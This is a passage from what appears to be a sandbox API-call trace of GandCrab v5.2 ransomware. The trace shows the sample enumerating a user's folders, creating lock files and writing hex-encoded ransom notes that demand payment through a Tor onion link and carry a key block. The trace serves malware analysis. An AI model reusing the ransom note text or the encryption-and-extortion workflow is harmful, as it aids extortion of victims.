79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0094.097] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0094.098] CloseHandle (hObject=0x2c4) returned 1 [0094.098] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.099] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.099] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x19b)) [0094.099] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.099] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.099] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.099] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\d2ca4a09d2ca4deb61a.lock") returned 91 [0094.099] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0094.100] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.100] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.100] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\") returned 67 [0094.100] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\*" [0094.100] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503778 [0094.101] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.101] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.102] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.102] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.102] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.102] lstrcmpW (lpString1="3DbDWjZltZQ", lpString2=".") returned 1 [0094.102] lstrcmpW (lpString1="3DbDWjZltZQ", lpString2="..") returned 1 [0094.102] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\", lpString2="3DbDWjZltZQ" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ" [0094.102] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\" [0094.102] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0094.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.103] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.103] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.103] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.104] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.104] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.104] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.104] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\\\TITWMVJL-DECRYPT.txt") returned 100 [0094.104] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\3DbDWjZltZQ\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\3dbdwjzltzq\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0094.108] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\